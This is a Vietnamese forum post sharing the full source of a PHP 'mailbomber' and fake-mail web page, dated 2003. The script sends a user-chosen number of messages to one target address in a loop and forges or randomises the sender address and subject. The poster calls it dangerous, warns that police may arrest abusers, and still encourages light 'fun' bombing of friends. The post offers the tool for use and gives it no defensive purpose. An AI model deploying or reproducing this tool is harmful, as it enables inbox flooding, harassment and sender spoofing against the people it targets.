ritter_bin
New member
Chú ý:
Yêu cầu host hỗ trợ php , BW lớn xíu k die host đấy
Tớ tách làm 2 để post khỏi kéo dài trang thui ! chứ thực ra là 1 đoạn của 1 file đó
code bom mail, fake mail này tuy đơn giản như cũng khá nguy hiểm, khuyên các bạn k nên lạm dụng nó quá ! bom mail vừa vừa cho vui, fake mail chọc bạn bè, phá phách là công an bắt đấy
<HTML>
<HEAD>
<TITLE>PHP Mailbomber</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#000080">
<?
if ($action == "BOMB")
{
if (ereg("[A-Za-z0-9_-]+([\.]{1}[A-Za-z0-9_-]+)*@[A-Za-z0-9-]+([\.]{1}[A-Za-z0-9-]+)+", $to))
{
echo "Sending $messages to $to<BR><BR><BR>";
}
else
{
die("Invalid emailaddress ($to)");
}
echo " $message , $check1 , $check2 , $from , $to , $messages ";
for ($i = 1; $i <= $messages; $i++)
{
$randn = rand(100000,900000);
if ($c1 == "ON") {
if ($c2 == "ON") {
mail($to, $randn, "$message", "From: $randn@$randn");
}
else
{
mail($to, $subject, "$message", "From: $randn@$randn");
}
}
else
{
mail($to, $subject, "$message", "From: $from");
}
}
}
?>
<div align="center">
<center>
<table border="1" width="100%" bgcolor="#008000" bordercolor="#0000FF" cellspacing="0" cellpadding="0" height="100%">
<tr>
<td width="100%" bgcolor="#000080" bordercolor="#0000FF">
<p align="center"><b><font color="#C0C0C0">PHP Bomber & Fake Mail</font></b></p>
<CENTER>
<form name="mailbomber" method="post" action="<?php echo $PHP_SELF ?>">
<table border="1" cellspacing="0" cellpadding="2" bordercolor="#C0C0C0">
<tr>
<td colspan="3" bgcolor="#C0C0C0" height="20" width="573">
<p align="center">PHP Bomber made by AnhTraiSG</p>
</td>
</tr>
<tr>
<td width="130" bgcolor="#CCCCCC" height="10"> Bomb from</td>
<td align="left" bgcolor="#CCCCCC" width="288" height="10">
<input type="text" name="from" size="40" style="background-color: #008080; color: #00FF00">
</td>
<td width="139" align="left" bgcolor="#CCCCCC" height="10">
<input type="checkbox" name="check2" value="ON" checked> random.
</td>
</tr>
<tr>
<td width="130" bgcolor="#C0C0C0" height="25"> Subject</td>
<td align="left" height="25" bgcolor="#C0C0C0" width="288">
<input type="text" name="subject" size="40" style="background-color: #008080; color: #FFFF00">
</td>
<td width="139" align="left" height="25" bgcolor="#C0C0C0">
<input type="checkbox" name="check1" value="ON"> random.
</td>
</tr>
<tr>
<td width="130" bgcolor="#CCCCCC" height="25"> Bomb to</td>
<td align="left" height="25" bgcolor="#CCCCCC" width="288">
<input type="text" name="to" size="40" style="background-color: #008080; color: #00FFFF">
</td>
<td width="139" align="left" height="25" bgcolor="#CCCCCC">
<input type="text" name="messages" value="1" size="3" style="background-color: #008080; color: #00FF00">
mails.
</td>
</tr>
<tr>
<td colspan="3" width="573" bgcolor="#C0C0C0" height="21"> <font color="#FF0000">
<marquee scrollamount="1" scrolldelay="60"> http://www.vnghiit.com - http://www.vuongnghi.tk </marquee>
</font></td>
</tr>
<tr>
<td width="130" bgcolor="#CCCCCC" height="40%"> Text</td>
<td colspan="2" width="435" bgcolor="#CCCCCC" height="40%">
<textarea name="message" cols="50" rows="9" style="background-color: #008080; color: #00FF00"></textarea>
</td>
</tr>
<tr>
<td width="130" bgcolor="#C0C0C0" height="27"> </td>
<td colspan="2" width="435" bgcolor="#C0C0C0" height="27">
<input type="submit" name="action" value="BOMB">
</td>
</tr>
</table>
</form>
</CENTER>
<p align="center"><b><font color="#C0C0C0">Chuc cac ban vui ve !</font><br><font color="#CCCCCC"> http://vnghiit.com - http://vuongnghi.tk </font><font color="#C0C0C0">
2003</font></b></td>
</tr>
</table>
</center>
</div>
</BODY>
</HTML>
Nguồn: http://vnitblog.com
Sửa lần cuối: